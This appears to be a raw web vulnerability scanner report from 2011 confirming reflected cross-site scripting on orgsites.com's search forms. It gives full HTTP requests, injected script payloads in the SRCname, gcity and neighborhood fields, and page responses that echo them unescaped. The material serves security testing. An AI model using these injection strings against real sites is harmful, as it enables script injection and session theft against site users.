/><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="\'\"--></style></script><script>netsparker(0x000114)</script>">\'\"--></style></script><script>netsparker(0x000114)</script>
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="Smith" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b> OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">Within Zip Area Smith</td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align=right valign=top><font face=arial size=1 color=989868>&nbsp;0 FOUND</font></td></tr></table><table border=0 width=100% cellpadding=2 cellspacing=0> <tr> <td align=left valign=top> <font face=Arial,Helvetica color=black size=1><I>NO ORGSITES LISTED</I><P> </td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value=""><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=\'\"--></style></script><script>netsparker(0x000114)</script>>\'\"--></style></script><script>netsparker(0x000114)</script><OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value=""><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href=&quo..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
neighborhood POST ALL
SRCname POST '"--></style></script><script>alert(0x000166)</script>
sts POST Y
ZipSearch POST Go!
zzzip POST search

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 143
Accept-Encoding: gzip, deflate

neighborhood=ALL&SRCname='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000166)%3c%2fscript%3e&sts=Y&ZipSearch=Go!&zzzip=search

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:11:23 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=1961122450; expires=Tue, 03-May-11 15:11:23 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#d27a2b"><!--_leftT.html Start-->
<a href=javascript:OpenWindowJ('002_Website.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">
<b><font size="1"> WEBSITE</a>:</b> <br />(Create your site)
<br />
<a href=javascript:OpenWindowJ('002_NewsBar.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif"> NEWSBAR</a>: <br />(Create your newsbar)
<br />
<a href=javascript:OpenWindowJ('002_Directory.php3','')>
<img src=../images/tri_white.gif width="9" height="10" border="0" alt="tri_white.gif">�DIRECTORY ENTRY</a>: <br/>(Don't need a website but want to be in the OrgSites Directory)
<br clear="all" />
<img src=../images/s.gif width="120" height="2" border="0" alt="s.gif">
Click on your choice.<br clear="all" />
You'll be on-line in minutes. Questions?<br />Read our <a href=http://www.orgsites.com/index.html?page=5>FAQs</a>.
</font>
<!--_leftT.html End--></td><td>&nbsp;&nbsp;</td></tr></table><br /><form action="index.html" method="POST"><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td>&nbsp;</td><td width="0" valign="top"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633"><b>Search<br>Neighborhood</b><br /></font></td></tr><tr valign="top"><td width="17"><img src=images/s.gif width="17" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Want to know what's<br />going on in a neighborhood?<br />Enter the zipcode<br>and &quot;Go&quot; find out.<br clear="all" /><img src=images/s.gif width="100" height="5"><br clear="all" />Category:<br /><select name="neighborhood"><option value="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><input type="radio" name="sts" CHECKED value="E">Events <input type="radio" name="sts" value="Y">Sites<br />Zip code:<br /><input type="text" name="SRCname" value="\'\"--></style></script><script>netsparker(0x000166)</script>" size="9"><input type="submit" name="ZipSearch" value="Go!"></td></tr></table><table width="176" cellpadding="0" cellspacing="0" border="0"><tr><td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td><td><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#006666"><input type="hidden" name="zzzip" value="search"></form><p /></td><td>&nbsp;&nbsp;&nbsp;</td></tr><!--_leftB.php3 Start-->
<!-- Talk to us section -->
<tr>
<td width="16"><img src=images/s.gif width="16" height="1" border="0" alt="s.gif"></td>
<td valign="top">
<font size="2" face="verdana,arial,helvetica" color="#666633">
<a href=javascript:OpenWindowE('_TOOL_eformH.php3?mailus=Mail','')>
<b>Talk to Us...</b></a><br /></font>
<font size="1" face="verdana,arial,helvetica" color="#666633">
Send us your questions or comments about your OrgSite. We really value your input, as it helps us prioritize our improvements.<p />
</td>
<td>����</td>
</tr>
<!--_leftB.php3 End--></table><!-- =============== end nested left nav table =============== --></td><!-- =============== DATE second column =============== --><td colspan="2" align="right" valign="top" bgcolor="#ffffcc"><img src=images/s.gif width="16" height="2" border="0" alt="s.gif"><br clear="all" /><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" color="#666633">Monday May 02, 2011&nbsp;&nbsp;&nbsp;</font></td></tr><!-- =============== start second row =============== --><tr><td align="left" valign="top" bgcolor="#ffffcc"><table width="100%" cellspacing="0" cellpadding="13" border="0"><tr><td align="left" valign="top" bgcolor="#ffffcc"><!-- =============== start includes =============== --><table cellspacing="0" cellpadding="0" width="100%" border="0"><tr bgcolor="#cccc99"><td align="left"><font size="2" face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc">&nbsp; <b>All OrgSites:</b></font>&nbsp;<font face="Verdana, Arial, Helvetica, sans-serif" color="#ffffcc" size="2">Within Zip Area \'\"--></style></script><script>netsparker(0x000166)</script></td> <td align="right" valign="top"><img src=images/rcorner.gif width="11" height="11" border="0" alt="rcorner.gif"></td></tr><tr bgcolor="#989868"><td colspan="2" valign="top"><img src=images/s.gif width="360" height="2"></td></tr></table><table border="0" width="100%" cellpadding="0" cellspacing="0"><tr><td align=right valign=top><font face=arial size=1 color=989868>&nbsp;0 FOUND</font></td></tr></table><table border=0 width=100% cellpadding=2 cellspacing=0> <tr> <td align=left valign=top> <font face=Arial,Helvetica color=black size=1><I>NO ORGSITES LISTED</I><P> </td></tr></table><p /><!-- =============== end include section =============== --></td></tr></table></td><!-- =============== end nested text table =============== --><!--RightPanel.incl Start--><td width="190" align="left" valign="top" bgcolor="#ffffcc"><!--=============== KEYWORD SEARCH PANEL ===============--><form action="index.html" method="post"><img src=images/s.gif width="174" height="16"><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/keyword.gif width="174" height="28" border="0" alt="Keyword Search"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="bottom" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2" color="#666633">&nbsp;&nbsp;Keyword:<br />&nbsp;&nbsp;<input type="text" name="keyw" size="15" value=""><br />&nbsp;&nbsp;Category:<br />&nbsp;&nbsp;<select name="neighborhood"><OPTION value=ALL>ALL<OPTION VALUE="ALL">ALL
<option value=ALL>ALL
<option value=Animals>Animals
<option value=Arts_Culture>Arts &amp; culture
<option value=Business>Business
<option value=Computers>Computers
<option value=Disaster>Disaster
<option value=Education>Education
<option value=Environment>Environment
<option value=Ethnic>Ethnic
<option value=Fraternal>Fraternal
<option value=Gov-Politics>Govt. & politics
<option value=Health>Health
<option value=Hobbies>Hobbies
<option value=Religion>Religion
<option value=Service>Service
<option value=Social>Social
<option value=Sports>Sports
<option value=Youth>Youth
<option value=Unique>Unique</font>
</select><br /><font size="1">&nbsp;&nbsp;State<br />&nbsp;&nbsp;<select name="gstate"><OPTION VALUE="ALL">ALL<OPTION VALUE=*>Choose<OPTION VALUE=AL>Alabama<OPTION VALUE=AK>Alaska<OPTION VALUE=AZ>Arizona<OPTION VALUE=AR>Arkansas<OPTION VALUE=CA>California<OPTION VALUE=CO>Colorado<OPTION VALUE=CT>Connecticut<OPTION VALUE=DE>Delaware<OPTION VALUE=DC>D.C.<OPTION VALUE=FL>Florida<OPTION VALUE=GA>Georgia<OPTION VALUE=HI>Hawaii<OPTION VALUE=ID>Idaho<OPTION VALUE=IL>Illinois<OPTION VALUE=IN>Indiana<OPTION VALUE=IA>Iowa<OPTION VALUE=KS>Kansas<OPTION VALUE=KY>Kentucky<OPTION VALUE=LA>Louisiana<OPTION VALUE=ME>Maine<OPTION VALUE=MD>Maryland<OPTION VALUE=MA>Massachusetts<OPTION VALUE=MI>Michigan<OPTION VALUE=MN>Minnesota<OPTION VALUE=MS>Mississippi<OPTION VALUE=MO>Missouri<OPTION VALUE=MT>Montana<OPTION VALUE=NE>Nebraska<OPTION VALUE=NV>Nevada<OPTION VALUE=NH>New Hampshire<OPTION VALUE=NJ>New Jersey<OPTION VALUE=NM>New Mexico<OPTION VALUE=NY>New York<OPTION VALUE=NC>North Carolina<OPTION VALUE=ND>North Dakota<OPTION VALUE=OH>Ohio<OPTION VALUE=OK>Oklahoma<OPTION VALUE=OR>Oregon<OPTION VALUE=PA>Pennsylvania<OPTION VALUE=RI>Rhode Island<OPTION VALUE=SC>South Carolina<OPTION VALUE=SD>South Dakota<OPTION VALUE=TN>Tennessee<OPTION VALUE=TX>Texas<OPTION VALUE=UT>Utah<OPTION VALUE=VT>Vermont<OPTION VALUE=VA>Virginia<OPTION VALUE=WA>Washington<OPTION VALUE=DC>Washington D.C.<OPTION VALUE=WV>West Virginia<OPTION VALUE=WI>Wisconsin<OPTION VALUE=WY>Wyoming</select><br />&nbsp;&nbsp;City:<br /></font>&nbsp;&nbsp;<input type="text" size="15" name="gcity" value=""><p />&nbsp;&nbsp;<input type="radio" name="sts" CHECKED value="Y">Sites <input type="radio" name="sts" value="E">Events &nbsp;&nbsp;<input type="submit" name="FullSearch" value="GO"></td></tr></table></td></tr><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/bottom.gif width="174" height="11" border="0" alt="bottom.gif"></td></tr></table></form><p /><!--=============== SITES PANEL ===============--><table width="174" cellspacing="0" cellpadding="0" border="0"><tr><td colspan="2" width="174" align="right" valign="top" bgcolor="#cccc99"><img src=images/new.gif width="174" height="28" border="0" alt="New OrgSites"></td></tr><tr bgcolor="#ffffcc"><td width="2" align="left" valign="top" bgcolor="#989868"><img src=images/s.gif width="2" height="10" border="0"></td><td><table width="171" cellspacing="0" cellpadding="5" border="0"><tr><td valign="top" bgcolor="#cccc99"><font face="verdana,arial,helvetica" size="-2"><!--FeaturedSites.html Start--><table border="0" width="100%" cellpadding="2" cellspacing="0"><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="md/church-crafts-and-activities" target="_blank">Church Crafts & Activities</a></font><br clear="all" /><font face="verdana,arial,helvetica" size="-2" color="#666633">Religion<br />, </td></tr><tr><td align="right" valign="top"><img src=images/tri_q.gif width="9" height="12" border="0" alt="tri_q.gif"></td><td align="left" valign="top"><font face="Verdana,Helvetica" size="1" color="#666633"><a href="ca/caf-socal" target="_blank">CAF - SouthernCalifornia Wing&#039;sWWII Aviation Museum</a></font><br clear="all" /><font face..
- /index.html

/index.html CONFIRMED

http://www.orgsites.com/index.html

Parameters

Parameter Type Value
FullSearch POST GO
gcity POST '"--></style></script><script>alert(0x00034A)</script>
gstate POST ALL
keyw POST 3
neighborhood POST ALL
sts POST E

Request

POST /index.html HTTP/1.1
Referer: http://www.orgsites.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=850614471; idV[49035]=1819662969; idV[54622]=1470334296; idV[52895]=643587439; idV[48945]=1693390705; idV[47313]=305822373; idV[1911]=1650887235; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 146
Accept-Encoding: gzip, deflate

FullSearch=GO&gcity='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00034A)%3c%2fscript%3e&gstate=ALL&keyw=3&neighborhood=ALL&sts=E

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:13:00 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Set-Cookie: idVistor[3]=5626861; expires=Tue, 03-May-11 15:13:01 GMT; path=/; domain=.orgsites.com
Transfer-Encoding: chunked
Content-Type: text/html


<!--added html xmlns below on 12-03-10--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" /><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" /><head><meta name="description" content="FREE websites and registry for organizations groups clubs teams, we help you create a free website which lists your events on Global Neighborhood Orgsites Registry Directory of Organizations with internal search engine"><meta name="keywords" content="Free websites,Registry Directory of Organizations,teams, members,organization management,clubs,groups,associations, search engine,events,global neighborhood,orgsites.com"><title>Free websites and registry directory for organizations or groups plus internal search engine for Global Neighborhood Orgsites free websites</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-type" content="text/html; charset=iso-8859-1" /><meta http-equiv="pragma" content="no-cache" /><meta name="robots" content="Index,Follow" /><style type="text/css"><!--a:link {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:active {color :#660000; font-family:arial,helvetica; text-decoration:underline;}a:visited {color :#800000; font-family:arial,helvetica; text-decoration:underline;}a:hover {color :Chocolate; font-family:arial,helvetica; text-decoration:underline;}--></style><script type="text/javascript" language="javascript">// <![CDATA[function OpenWindowE(url, name){ popupWin = window.open(url, name, 'noscroll,width=300,height=350,left=50,top=50')}//01-30-11: change window parms to make it largerfunction OpenWindowJ(url, name){//01-30-11 popupWin = window.open(url, name, 'scrollbars,width=490,height=480,left=10,top=0') popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}function OpenWindowM(url, name){ popupWin = window.open(url, name, 'noscroll,status,width=380,height=245,left=50,top=50')}function OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars,width=300,height=400,left=20,top=20')}// ]]> </script></head><body bgcolor="#ffffcc" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#003333" link="#800000" vlink="#800000" alink="#660000"><a name="top"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td width="176" align="left" valign="top" rowspan="2" bgcolor="#FFFFFF"><map name="OrgSite"><area shape="RECT" coords="15,13,175,59" href="index.html"></map><img src=images/logo2.gif width="176" height="182" border="0" usemap="#OrgSite" alt="OrgSites"><img src=images/join2.gif width="176" height="20" alt="Join Now!" border="0" align="top"><table width="176" cellpadding="4" cellspacing="0" border="0"><tr valign="top"><td width="4" valign="top"><img src=images/s.gif width="4" height="1" border="0" alt="s.gif"></td><td valign="top"><font size="-2" face="Verdana, Arial, Helvetica, sans-serif" 